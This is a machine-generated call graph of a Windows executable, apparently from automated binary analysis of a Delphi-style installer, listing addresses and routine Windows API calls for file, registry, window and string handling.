49685->49660 49686->49675 49687->49666 49688->49684 49689->49669 49690->49674 49691 40cfdc 49692 40cfe4 49691->49692 49693 40d012 49692->49693 49694 40d007 49692->49694 49702 40d00e 49692->49702 49696 40d016 49693->49696 49697 40d028 49693->49697 49703 4062a0 GlobalHandle GlobalUnWire GlobalFree 49694->49703 49704 406274 GlobalAlloc GlobalFix 49696->49704 49705 406284 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 49697->49705 49700 40d024 49700->49702 49706 408c24 49700->49706 49703->49702 49704->49700 49705->49700 49707 408c30 49706->49707 49714 406d54 LoadStringA 49707->49714 49710 403450 4 API calls 49711 408c61 49710->49711 49712 403400 4 API calls 49711->49712 49713 408c76 49712->49713 49713->49702 49715 4034e0 4 API calls 49714->49715 49716 406d81 49715->49716 49716->49710 49717 41655c 73A15CF0 49718 48b868 49719 48b8a2 49718->49719 49720 48b8ae 49719->49720 49721 48b8a4 49719->49721 49723 48b8bd 49720->49723 49724 48b8e6 49720->49724 49917 409000 MessageBeep 49721->49917 49726 44688c 18 API calls 49723->49726 49729 48b8f5 49724->49729 49733 48b91e 49724->49733 49725 403420 4 API calls 49727 48befa 49725->49727 49728 48b8ca 49726->49728 49730 403400 4 API calls 49727->49730 49918 406b18 49728->49918 49732 44688c 18 API calls 49729->49732 49734 48bf02 49730->49734 49736 48b902 49732->49736 49739 48b92d 49733->49739 49740 48b956 49733->49740 49926 406b68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49736->49926 49743 44688c 18 API calls 49739->49743 49746 48b97e 49740->49746 49747 48b965 49740->49747 49741 48b8a9 49741->49725 49742 48b90d 49927 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49742->49927 49745 48b93a 49743->49745 49928 406b9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49745->49928 49754 48b98d 49746->49754 49755 48b9b2 49746->49755 49930 4071e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49747->49930 49750 48b945 49929 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49750->49929 49752 48b96d 49931 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49752->49931 49756 44688c 18 API calls 49754->49756 49759 48b9ea 49755->49759 49760 48b9c1 49755->49760 49757 48b99a 49756->49757 49932 407210 49757->49932 49765 48b9f9 49759->49765 49766 48ba22 49759->49766 49762 44688c 18 API calls 49760->49762 49761 48b9a2 49935 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49935 49764 48b9ce 49762->49764 49936 42c6e0 49764->49936 49768 44688c 18 API calls 49765->49768 49773 48ba6e 49766->49773 49774 48ba31 49766->49774 49770 48ba06 49768->49770 49946 407160 8 API calls 49770->49946 49779 48ba7d 49773->49779 49780 48baa6 49773->49780 49776 44688c 18 API calls 49774->49776 49775 48ba11 49947 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49775->49947 49778 48ba40 49776->49778 49781 44688c 18 API calls 49778->49781 49782 44688c 18 API calls 49779->49782 49786 48bade 49780->49786 49787 48bab5 49780->49787 49783 48ba51 49781->49783 49785 48ba8a 49782->49785 49948 48b56c 8 API calls 49783->49948 49950 42c780 49785->49950 49796 48baed 49786->49796 49797 48bb16 49786->49797 49790 44688c 18 API calls 49787->49790 49788 48ba5d 49949 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49788->49949 49793 48bac2 49790->49793 49956 42c7a8 49793->49956 49799 44688c 18 API calls 49796->49799 49802 48bb4e 49797->49802 49803 48bb25 49797->49803 49801 48bafa 49799->49801 49965 42c7d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49801->49965 49810 48bb5d 49802->49810 49811 48bb86 49802->49811 49805 44688c 18 API calls 49803->49805 49808 48bb32 49805->49808 49806 48bb05 49966 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49806->49966 49967 42c808 49808->49967 49812 44688c 18 API calls 49810->49812 49817 48bbd2 49811->49817 49818 48bb95 49811->49818 49814 48bb6a 49812->49814 49973 42c830 49814->49973 49823 48bbe1 49817->49823 49824 48bc24 49817->49824 49820 44688c 18 API calls 49818->49820 49822 48bba4 49820->49822 49825 44688c 18 API calls 49822->49825 49826 44688c 18 API calls 49823->49826 49830 48bc33 49824->49830 49831 48bc97 49824->49831 49827 48bbb5 49825->49827 49828 48bbf4 49826->49828 49979 42c424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49827->49979 49832 44688c 18 API calls 49828->49832 49905 44688c 49830->49905 49839 48bcd6 49831->49839 49840 48bca6 49831->49840 49836 48bc05 49832->49836 49833 48bbc1 49980 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49833->49980 49981 48b764 12 API calls 49836->49981 49851 48bd15 49839->49851 49852 48bce5 49839->49852 49843 44688c 18 API calls 49840->49843 49842 48bc13 49982 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49842->49982 49846 48bcb3 49843->49846 49844 48bc4e 49847 48bc52 49844->49847 49848 48bc87 49844->49848 49985 45128c 49846->49985 49850 44688c 18 API calls 49847->49850 49984 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49848->49984 49855 48bc61 49850->49855 49861 48bd54 49851->49861 49862 48bd24 49851->49862 49856 44688c 18 API calls 49852->49856 49910 451604 49855->49910 49859 48bcf2 49856->49859 49992 4510f4 49859->49992 49869 48bd9c 49861->49869 49870 48bd63 49861->49870 49865 44688c 18 API calls 49862->49865 49863 48bc71 49983 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49863->49983 49864 48bcff 49999 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49864->49999 49868 48bd31 49865->49868 50000 451794 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 49868->50000 49877 48bdab 49869->49877 49878 48bde4 49869->49878 49872 44688c 18 API calls 49870->49872 49874 48bd72 49872->49874 49873 48bd3e 50001 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49873->50001 49876 44688c 18 API calls 49874->49876 49879 48bd83 49876->49879 49880 44688c 18 API calls 49877->49880 49883 48bdf7 49878->49883 49889 48bead 49878->49889 50002 446b0c 49879->50002 49881 48bdba 49880->49881 49882 44688c 18 API calls 49881->49882 49884 48bdcb 49882->49884 49886 44688c 18 API calls 49883->49886 49890 446b0c 5 API calls 49884->49890 49887 48be24 49886->49887 49888 44688c 18 API calls 49887->49888 49891 48be3b 49888->49891 49889->49741 50011 446830 18 API calls 49889->50011 49890->49741 50008 407d44 7 API calls 49891->50008 49893 48bec6 50012 42e670 FormatMessageA 49893->50012 49898 48be5d 49899 44688c 18 API calls 49898->49899 49900 48be71 49899->49900 50009 408470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49900->50009 49902 48be7c 50010 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49902->50010 49904 48be88 49906 446894 49905->49906 50017 43590c 49906->50017 49908 4468b3 49909 42c528 7 API calls 49908->49909 49909->49844 50047 4510a8 49910->50047 49912 451621 49912->49863 49913 45161d 49913->49912 49914 451645 MoveFileA GetLastError 49913->49914 50053 4510e4 49914->50053 49917->49741 49919 406b27 49918->49919 49920 406b40 49919->49920 49921 406b49 49919->49921 49922 403400 4 API calls 49920->49922 50056 403778 49921->50056 49923 406b47 49922->49923 49925 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49923->49925 49925->49741 49926->49742 49927->49741 49928->49750 49929->49741 49930->49752 49931->49741 50063 403738 49932->50063 49935->49741 49937 403738 49936->49937 49938 42c703 GetFullPathNameA 49937->49938 49939 42c726 49938->49939 49940 42c70f 49938->49940 49942 403494 4 API calls 49939->49942 49940->49939 49941 42c717 49940->49941 49943 4034e0 4 API calls 49941->49943 49944 42c724 49942->49944 49943->49944 49945 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49944->49945 49945->49741 49946->49775 49947->49741 49948->49788 49949->49741 50065 42c678 49950->50065 49953 403778 4 API calls 49954 42c7a1 49953->49954 49955 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49954->49955 49955->49741 50080 42c594 49956->50080 49959 42c7c5 49962 403778 4 API calls 49959->49962 49960 42c7bc 49961 403400 4 API calls 49960->49961 49963 42c7c3 49961->49963 49962->49963 49964 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49963->49964 49964->49741 49965->49806 49966->49741 49968 42c678 IsDBCSLeadByte 49967->49968 49969 42c818 49968->49969 49970 403778 4 API calls 49969->49970 49971 42c82a 49970->49971 49972 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49971->49972 49972->49741 49974 42c678 IsDBCSLeadByte 49973->49974 49975 42c840 49974->49975 49976 403778 4 API calls 49975->49976 49977 42c851 49976->49977 49978 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49977->49978 49978->49741 49979->49833 49980->49741 49981->49842 49982->49741 49983->49741 49984->49741 49986 4510a8 2 API calls 49985->49986 49987 4512a2 49986->49987 49988 4512a6 49987->49988 49989 4512c2 DeleteFileA GetLastError 49987->49989 49991 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49988->49991 49990 4510e4 Wow64RevertWow64FsRedirection 49989->49990 49990->49988 49991->49741 49993 4510a8 2 API calls 49992->49993 49995 45110a 49993->49995 49994 45110e 49994->49864 49995->49994 49996 45112c CreateDirectoryA GetLastError 49995->49996 49997 4510e4 Wow64RevertWow64FsRedirection 49996->49997 49998 451152 49997->49998 49998->49864 49999->49741 50000->49873 50001->49741 50003 446b14 50002->50003 50083 435c74 VariantClear 50003->50083 50005 446b37 50006 446b4e 50005->50006 50084 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50005->50084 50006->49741 50008->49898 50009->49902 50010->49904 50011->49893 50013 42e696 50012->50013 50014 4034e0 4 API calls 50013->50014 50015 42e6b3 50014->50015 50016 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50015->50016 50016->49741 50018 435918 50017->50018 50019 43593a 50017->50019 50018->50019 50037 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50018->50037 50020 4359bd 50019->50020 50021 435981 50019->50021 50022 4359b1 50019->50022 50023 4359a5 50019->50023 50024 43598d 50019->50024 50030 435999 50019->50030 50046 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50020->50046 50038 403510 50021->50038 50045 4040e8 18 API calls 50022->50045 50041 403494 50023->50041 50029 403510 4 API calls 50024->50029 50028 4359ce 50028->49908 50034 435996 50029->50034 50030->49908 50034->49908 50036 4359ba 50036->49908 50037->50019 50039 4034e0 4 API calls 50038->50039 50040 40351d 50039->50040 50040->49908 50042 403498 50041->50042 50043 4034ba 50042->50043 50044 402660 4 API calls 50042->50044 50043->49908 50044->50043 50045->50036 50046->50028 50048 4510b6 50047->50048 50049 4510b2 50047->50049 50050 4510bf Wow64DisableWow64FsRedirection 50048->50050 50051 4510d8 SetLastError 50048->50051 50049->49913 50052 4510d3 50050->50052 50051->50052 50052->49913 50054 4510f3 50053->50054 50055 4510e9 Wow64RevertWow64FsRedirection 50053->50055 50054->49863 50055->50054 50057 4037aa 50056->50057 50058 40377d 50056->50058 50059 403400 4 API calls 50057->50059 50058->50057 50061 403791 50058->50061 50060 4037a0 50059->50060 50060->49923 50062 4034e0 4 API calls 50061->50062 50062->50060 50064 40373c SetCurrentDirectoryA 50063->50064 50064->49761 50070 42c59c 50065->50070 50067 42c6d7 50067->49953 50068 42c68d 50068->50067 50077 42c3b4 IsDBCSLeadByte 50068->50077 50073 42c5ad 50070->50073 50071 42c611 50074 42c60c 50071->50074 50079 42c3b4 IsDBCSLeadByte 50071->50079 50073->50071 50076 42c5cb 50073->50076 50074->50068 50076->50074 50078 42c3b4 IsDBCSLeadByte 50076->50078 50077->50068 50078->50076 50079->50074 50081 42c59c IsDBCSLeadByte 50080->50081 50082 42c59b 50081->50082 50082->49959 50082->49960 50083->50005 50084->50006 50085 40ce60 50086 40ce72 50085->50086 50087 40ce6d 50085->50087 50089 406eb0 CloseHandle 50087->50089 50089->50086 50090 47b0a3 50091 47b0ac 50090->50091 50094 47b0d7 50090->50094 50093 47b0c9 50091->50093 50091->50094 50092 47b116 50095 47b136 50092->50095 50096 47b129 50092->50096 50495 471f48 162 API calls 50093->50495 50094->50092 50497 479aa8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50094->50497 50102 47b150 50095->50102 50103 47b13f 50095->50103 50099 47b12d 50096->50099 50100 47b16b 50096->50100 50105 47b131 50099->50105 50112 47b1ae 50099->50112 50113 47b1c9 50099->50113 50108 47b174 50100->50108 50109 47b18f 50100->50109 50101 47b0ce 50101->50094 50496 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50101->50496 50500 479ce4 37 API calls 50102->50500 50499 479c74 37 API calls 50103->50499 50104 47b109 50498 479c74 37 API calls 50104->50498 50118 47b1f2 50105->50118 50119 47b210 50105->50119 50501 479ce4 37 API calls 50108->50501 50502 479ce4 37 API calls 50109->50502 50503 479ce4 37 API calls 50112->50503 50504 479ce4 37 API calls 50113->50504 50121 47b207 50118->50121 50505 479c74 37 API calls 50118->50505 50507 479940 24 API calls 50119->50507 50506 479940 24 API calls 50121->50506 50123 47b20e 50125 47b226 50123->50125 50126 47b220 50123->50126 50127 47b224 50125->50127 50128 479c50 37 API calls 50125->50128 50126->50127 50206 479c50 50126->50206 50211 47722c 50127->50211 50128->50127 50567 4795d4 37 API calls 50206->50567 50208 479c6b 50568 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50208->50568 50569 42d774 GetWindowsDirectoryA 50211->50569 50213 47724a 50214 403450 4 API calls 50213->50214 50215 477257 50214->50215 50571 42d7a0 GetSystemDirectoryA 50215->50571 50217 47725f 50218 403450 4 API calls 50217->50218 50219 47726c 50218->50219 50573 42d7cc 50219->50573 50221 477274 50222 403450 4 API calls 50221->50222 50223 477281 50222->50223 50224 4772a6 50223->50224 50225 47728a 50223->50225 50227 403400 4 API calls 50224->50227 50629 42d0e4 50225->50629 50229 4772a4 50227->50229 50231 4772eb 50229->50231 50233 42c7a8 5 API calls 50229->50233 50230 403450 4 API calls 50230->50229 50577 4770b4 50231->50577 50235 4772c6 50233->50235 50237 403450 4 API calls 50235->50237 50236 403450 4 API calls 50239 477307 50236->50239 50238 4772d3 50237->50238 50238->50231 50241 403450 4 API calls 50238->50241 50240 477325 50239->50240 50242 4035c0 4 API calls 50239->50242 50243 4770b4 8 API calls 50240->50243 50241->50231 50242->50240 50244 477334 50243->50244 50245 403450 4 API calls 50244->50245 50246 477341 50245->50246 50247 477369 50246->50247 50248 42c36c 5 API calls 50246->50248 50249 4773d0 50247->50249 50253 4770b4 8 API calls 50247->50253 50250 477357 50248->50250 50251 4773fa 50249->50251 50252 4773d9 50249->50252 50254 4035c0 4 API calls 50250->50254 50588 42c36c 50251->50588 50255 42c36c 5 API calls 50252->50255 50256 477381 50253->50256 50254->50247 50258 4773e6 50255->50258 50259 403450 4 API calls 50256->50259 50261 4035c0 4 API calls 50258->50261 50262 47738e 50259->50262 50260 477407 50598 4035c0 50260->50598 50264 4773f8 50261->50264 50265 4773a1 50262->50265 50637 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50262->50637 50620 477198 50264->50620 50267 4770b4 8 API calls 50265->50267 50269 4773b0 50267->50269 50271 403450 4 API calls 50269->50271 50274 4773bd 50271->50274 50272 403400 4 API calls 50273 477433 50272->50273 50276 477688 50273->50276 50274->50249 50638 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50274->50638 50277 477690 50276->50277 50277->50277 50664 4523a8 50277->50664 50280 403450 4 API calls 50281 4776bd 50280->50281 50282 403494 4 API calls 50281->50282 50283 4776ca 50282->50283 50682 40357c 50283->50682 50285 4776d8 50286 455bc8 24 API calls 50285->50286 50287 4776e0 50286->50287 50288 4776f3 50287->50288 50712 4553bc 6 API calls 50287->50712 50290 42c36c 5 API calls 50288->50290 50291 477700 50290->50291 50292 4035c0 4 API calls 50291->50292 50293 477710 50292->50293 50294 47771a CreateDirectoryA 50293->50294 50295 477724 GetLastError 50294->50295 50318 477780 50294->50318 50297 4508e0 4 API calls 50295->50297 50296 4035c0 4 API calls 50298 477795 50296->50298 50299 47773c 50297->50299 50696 477630 50298->50696 50713 406cd0 19 API calls 50299->50713 50318->50296 50495->50101 50497->50104 50498->50092 50499->50105 50500->50105 50501->50105 50502->50105 50503->50105 50504->50105 50505->50121 50506->50123 50507->50123 50567->50208 50570 42d795 50569->50570 50570->50213 50572 42d7c1 50571->50572 50572->50217 50574 403400 4 API calls 50573->50574 50575 42d7dc GetModuleHandleA GetProcAddress 50574->50575 50576 42d7f5 50575->50576 50576->50221 50639 42dc54 50577->50639 50579 4770da 50580 477100 50579->50580 50581 4770de 50579->50581 50582 403400 4 API calls 50580->50582 50642 42db84 50581->50642 50584 477107 50582->50584 50584->50236 50586 4770f5 RegCloseKey 50586->50584 50587 403400 4 API calls 50587->50586 50589 42c376 50588->50589 50590 42c399 50588->50590 50662 42c858 CharPrevA 50589->50662 50592 403494 4 API calls 50590->50592 50593 42c3a2 50592->50593 50593->50260 50594 42c37d 50594->50590 50595 42c388 50594->50595 50596 4035c0 4 API calls 50595->50596 50597 42c396 50596->50597 50597->50260 50599 4035c4 50598->50599 50603 40357c 50598->50603 50600 403450 50599->50600 50601 4035e2 50599->50601 50602 4035d4 50599->50602 50599->50603 50606 4034bc 4 API calls 50600->50606 50609 403464 50600->50609 50607 4034bc 4 API calls 50601->50607 50605 403450 4 API calls 50602->50605 50603->50600 50608 4035bf 50603->50608 50610 40358a 50603->50610 50604 403490 50604->50264 50605->50603 50606->50609 50616 4035f5 50607->50616 50608->50264 50609->50604 50613 402660 4 API calls 50609->50613 50611 4035b4 50610->50611 50612 40359d 50610->50612 50614 4038a4 4 API calls 50611->50614 50615 4038a4 4 API calls 50612->50615 50613->50604 50618 4035a2 50614->50618 50615->50618 50617 403450 4 API calls 50616->50617 50619 403621 50617->50619 50618->50264 50619->50264 50621 4771a6 50620->50621 50622 42dc54 RegOpenKeyExA 50621->50622 50623 4771ce 50622->50623 50624 4771ff 50623->50624 50625 42db84 6 API calls 50623->50625 50624->50272 50626 4771e4 50625->50626 50627 42db84 6 API calls 50626->50627 50628 4771f6 RegCloseKey 50627->50628 50628->50624 50630 4038a4 4 API calls 50629->50630 50631 42d0f7 50630->50631 50632 42d10e GetEnvironmentVariableA 50631->50632 50636 42d121 50631->50636 50663 42da08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50631->50663 50632->50631 50633 42d11a 50632->50633 50634 403400 4 API calls 50633->50634 50634->50636 50636->50230 50637->50265 50638->50249 50640 42dc65 RegOpenKeyExA 50639->50640 50641 42dc5f 50639->50641 50640->50579 50641->50640 50645 42da38 50642->50645 50646 42da5e RegQueryValueExA 50645->50646 50647 42da81 50646->50647 50652 42daa3 50646->50652 50649 42da9b 50647->50649 50647->50652 50653 4034e0 4 API calls 50647->50653 50654 403744 4 API calls 50647->50654 50648 403400 4 API calls 50650 42db6f 50648->50650 50651 403400 4 API calls 50649->50651 50650->50586 50650->50587 50651->50652 50652->50648 50653->50647 50655 42dad8 RegQueryValueExA 50654->50655 50655->50646 50656 42daf4 50655->50656 50656->50652 50657 4038a4 4 API calls 50656->50657 50658 42db36 50657->50658 50659 42db48 50658->50659 50661 403744 4 API calls 50658->50661 50660 403450 4 API calls 50659->50660 50660->50652 50661->50659 50662->50594 50663->50631 50671 4523c8 50664->50671 50667 4523ed CreateDirectoryA 50668 452465 50667->50668 50669 4523f7 GetLastError 50667->50669 50670 403494 4 API calls 50668->50670 50669->50671 50673 45246f 50670->50673 50671->50667 50672 4508e0 4 API calls 50671->50672 50679 42e670 5 API calls 50671->50679 50680 4508b0 4 API calls 50671->50680 50720 42d850 50671->50720 50743 452134 50671->50743 50762 406cd0 19 API calls 50671->50762 50763 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50671->50763 50672->50671 50674 403420 4 API calls 50673->50674 50675 452489 50674->50675 50677 403420 4 API calls 50675->50677 50678 452496 50677->50678 50678->50280 50679->50671 50680->50671 50683 403580 50682->50683 50684 4035bf 50682->50684 50685 40358a 50683->50685 50689 403450 50683->50689 50684->50285 50686 4035b4 50685->50686 50687 40359d 50685->50687 50688 4038a4 4 API calls 50686->50688 50691 4038a4 4 API calls 50687->50691 50695 4035a2 50688->50695 50692 4034bc 4 API calls 50689->50692 50693 403464 50689->50693 50690 403490 50690->50285 50691->50695 50692->50693 50693->50690 50694 402660 4 API calls 50693->50694 50694->50690 50695->50285 50814 40d0ac 50696->50814 50712->50288 50721 42d0e4 5 API calls 50720->50721 50722 42d876 50721->50722 50723 42d882 50722->50723 50764 42cc24 50722->50764 50724 42d0e4 5 API calls 50723->50724 50726 42d8ce 50723->50726 50727 42d892 50724->50727 50728 42c6e0 5 API calls 50726->50728 50729 42cc24 7 API calls 50727->50729 50731 42d89e 50727->50731 50732 42d8d8 50728->50732 50729->50731 50730 42d8c3 50730->50726 50734 42d774 GetWindowsDirectoryA 50730->50734 50731->50726 50731->50730 50733 42d0e4 5 API calls 50731->50733 50735 42c36c 5 API calls 50732->50735 50736 42d8b7 50733->50736 50734->50726 50737 42d8e3 50735->50737 50736->50730 50739 42cc24 7 API calls 50736->50739 50738 403494 4 API calls 50737->50738 50740 42d8ed 50738->50740 50739->50730 50741 403420 4 API calls 50740->50741 50742 42d907 50741->50742 50742->50671 50744 452154 50743->50744 50745 42c36c 5 API calls 50744->50745 50746 45216d 50745->50746 50747 403494 4 API calls 50746->50747 50748 452178 50747->50748 50749 42ca9c 6 API calls 50748->50749 50752 4508e0 4 API calls 50748->50752 50755 4521f4 50748->50755 50784 4520c0 50748->50784 50792 403634 50748->50792 50798 451374 50748->50798 50806 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50748->50806 50749->50748 50752->50748 50756 403494 4 API calls 50755->50756 50757 4521ff 50756->50757 50758 403420 4 API calls 50757->50758 50759 452219 50758->50759 50760 403400 4 API calls 50759->50760 50761 452221 50760->50761 50761->50671 50762->50671 50763->50671 50767 42cba8 50764->50767 50773 42ca9c 50767->50773 50769 42cbca 50770 42cbd2 GetFileAttributesA 50769->50770 50771 403400 4 API calls 50770->50771 50772 42cbef 50771->50772 50772->50723 50774 42c59c IsDBCSLeadByte 50773->50774 50775 42caad 50774->50775 50776 42cad4 50775->50776 50783 42ca20 CharPrevA 50775->50783 50778 42caea 50776->50778 50779 42cadf 50776->50779 50780 403778 4 API calls 50778->50780 50781 403494 4 API calls 50779->50781 50782 42cae8 50780->50782 50781->50782 50782->50769 50783->50775 50785 403400 4 API calls 50784->50785 50786 4520e1 50785->50786 50787 403510 4 API calls 50786->50787 50789 45210e 50786->50789 50807 403800 50786->50807 50787->50786 50790 403400 4 API calls 50789->50790 50791 452123 50790->50791 50791->50748 50793 40363c 50792->50793 50794 4034bc 4 API calls 50793->50794 50795 40364f 50794->50795 50796 403450 4 API calls 50795->50796 50797 403677 50796->50797 50799 4510a8 2 API calls 50798->50799 50800 45138a 50799->50800 50801 45138e 50800->50801 50811 42cc38 50800->50811 50801->50748 50804 4510e4 Wow64RevertWow64FsRedirection 50805 4513c9 50804->50805 50805->50748 50806->50748 50808 403804 50807->50808 50810 40382f 50807->50810 50809 4038a4 4 API calls 50808->50809 50809->50810 50810->50786 50812 42cba8 7 API calls 50811->50812 50813 42cc42 GetLastError 50812->50813 50813->50804 52723 48c62c 52724 48c660 52723->52724 52725 48c662 52724->52725 52726 48c676 52724->52726 52859 446830 18 API calls 52725->52859 52729 48c6b2 52726->52729 52730 48c685 52726->52730 52728 48c66b Sleep 52831 48c6ad 52728->52831 52735 48c6ee 52729->52735 52736 48c6c1 52729->52736 52732 44688c 18 API calls 52730->52732 52731 403420 4 API calls 52733 48cb20 52731->52733 52734 48c694 52732->52734 52738 48c69c FindWindowA 52734->52738 52741 48c6fd 52735->52741 52742 48c744 52735->52742 52737 44688c 18 API calls 52736->52737 52739 48c6ce 52737->52739 52740 446b0c 5 API calls 52738->52740 52743 48c6d6 FindWindowA 52739->52743 52740->52831 52860 446830 18 API calls 52741->52860 52748 48c7a0 52742->52748 52749 48c753 52742->52749 52746 446b0c 5 API calls 52743->52746 52745 48c709 52861 446830 18 API calls 52745->52861 52841 48c6e9 52746->52841 52755 48c7fc 52748->52755 52756 48c7af 52748->52756 52864 446830 18 API calls 52749->52864 52750 48c716 52862 446830 18 API calls 52750->52862 52753 48c75f 52865 446830 18 API calls 52753->52865 52754 48c723 52863 446830 18 API calls 52754->52863 52766 48c80b 52755->52766 52767 48c836 52755->52767 52869 446830 18 API calls 52756->52869 52758 48c76c 52866 446830 18 API calls 52758->52866 52762 48c72e SendMessageA 52765 446b0c 5 API calls 52762->52765 52763 48c7bb 52870 446830 18 API calls 52763->52870 52764 48c779 52867 446830 18 API calls 52764->52867 52765->52841 52770 44688c 18 API calls 52766->52770 52776 48c884 52767->52776 52777 48c845 52767->52777 52773 48c818 52770->52773 52771 48c7c8 52871 446830 18 API calls 52771->52871 52772 48c784 PostMessageA 52868 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52772->52868 52781 48c820 RegisterClipboardFormatA 52773->52781 52775 48c7d5 52872 446830 18 API calls 52775->52872 52787 48c8d8 52776->52787 52788 48c893 52776->52788 52874 446830 18 API calls 52777->52874 52784 446b0c 5 API calls 52781->52784 52782 48c7e0 SendNotifyMessageA 52873 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52782->52873 52783 48c851 52875 446830 18 API calls 52783->52875 52784->52831 52795 48c92c 52787->52795 52796 48c8e7 52787->52796 52877 446830 18 API calls 52788->52877 52789 48c85e 52876 446830 18 API calls 52789->52876 52791 48c89f 52878 446830 18 API calls 52791->52878 52794 48c869 SendMessageA 52798 446b0c 5 API calls 52794->52798 52803 48c93b 52795->52803 52804 48c98e 52795->52804 52881 446830 18 API calls 52796->52881 52797 48c8ac 52879 446830 18 API calls 52797->52879 52798->52841 52801 48c8f3 52882 446830 18 API calls 52801->52882 52802 48c8b7 PostMessageA 52880 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52802->52880 52807 44688c 18 API calls 52803->52807 52812 48c99d 52804->52812 52813 48ca15 52804->52813 52809 48c948 52807->52809 52808 48c900 52883 446830 18 API calls 52808->52883 52814 42e1f0 2 API calls 52809->52814 52811 48c90b SendNotifyMessageA 52884 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52811->52884 52816 44688c 18 API calls 52812->52816 52821 48ca4a 52813->52821 52822 48ca24 52813->52822 52817 48c955 52814->52817 52825 48c9ac 52816->52825 52818 48c96b GetLastError 52817->52818 52819 48c95b 52817->52819 52823 446b0c 5 API calls 52818->52823 52820 446b0c 5 API calls 52819->52820 52824 48c969 52820->52824 52832 48ca59 52821->52832 52833 48ca7c 52821->52833 52890 446830 18 API calls 52822->52890 52823->52824 52828 446b0c 5 API calls 52824->52828 52885 446830 18 API calls 52825->52885 52827 48ca2e FreeLibrary 52891 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52827->52891 52828->52831 52831->52731 52835 44688c 18 API calls 52832->52835 52842 48ca8b 52833->52842 52848 48cabf 52833->52848 52834 48c9bf GetProcAddress 52836 48c9cb 52834->52836 52837 48ca05 52834->52837 52838 48ca65 52835->52838 52886 446830 18 API calls 52836->52886 52889 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52837->52889 52845 48ca6d CreateMutexA 52838->52845 52841->52831 52892 4869a8 18 API calls 52842->52892 52843 48c9d7 52887 446830 18 API calls 52843->52887 52845->52831 52847 48c9e4 52851 446b0c 5 API calls 52847->52851 52848->52831 52894 4869a8 18 API calls 52848->52894 52850 48ca97 52852 48caa8 OemToCharBuffA 52850->52852 52853 48c9f5 52851->52853 52893 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52852->52893 52888 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52853->52888 52856 48cada 52857 48caeb CharToOemBuffA 52856->52857 52895 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52857->52895 52859->52728 52860->52745 52861->52750 52862->52754 52863->52762 52864->52753 52865->52758 52866->52764 52867->52772 52868->52841 52869->52763 52870->52771 52871->52775 52872->52782 52873->52831 52874->52783 52875->52789 52876->52794 52877->52791 52878->52797 52879->52802 52880->52841 52881->52801 52882->52808 52883->52811 52884->52831 52885->52834 52886->52843 52887->52847 52888->52841 52889->52841 52890->52827 52891->52831 52892->52850 52893->52831 52894->52856 52895->52831 52896 49292c 52950 403344 52896->52950 52898 49293a 52953 4056a0 52898->52953 52900 49293f 52956 4098b4 52900->52956 52904 492949 52966 4108c4 52904->52966 52906 49294e 52970 412898 52906->52970 52908 492958 52975 418fb0 GetVersion 52908->52975 53213 4032fc 52950->53213 52952 403349 GetModuleHandleA GetCommandLineA 52952->52898 52955 4056db 52953->52955 53214 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52953->53214 52955->52900 53215 408f8c 52956->53215 52965 409ae8 6F561CD0 52965->52904 52967 4108ce 52966->52967 52968 41090d GetCurrentThreadId 